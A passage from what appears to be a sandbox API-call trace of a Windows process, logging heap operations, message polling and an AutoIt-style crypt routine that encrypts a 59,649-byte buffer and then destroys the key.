HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0172.345] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0172.345] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.345] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0172.346] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0172.346] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0172.347] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26c8 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0172.347] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c2778, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2778*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.347] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2838 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28c8 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2798 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0172.348] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.349] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.349] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0172.349] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26d8 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0172.350] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0172.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.350] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.350] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.351] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.351] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.351] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.351] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.351] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.351] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.351] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.352] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.352] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xe8ff, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xe900) returned 1 [0172.352] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.352] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.353] CharLowerBuffW (in: lpsz="byte[59649]", cchLength=0xb | out: lpsz="byte[59649]") returned 0xb [0172.353] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.356] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.356] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.356] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.357] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.357] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9d3a88*, pdwDataLen=0x87e820*=0xe8ff, dwBufLen=0xe900 | out: pbData=0x9d3a88*, pdwDataLen=0x87e820*=0xe900) returned 1 [0172.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.358] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.360] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.360] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.360] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.360] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.360] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.360] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.360] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.360] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.360] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.361] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.361] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.366] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.373] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.373] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.373] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0172.373] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.373] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.373] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0172.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.374] CryptDestroyKey (hKey=0x90aed8) returned 1 [0172.374] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.374] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0172.374] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0172.374] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0172.374] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.374] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0172.374] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.374] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.375] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0172.375] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 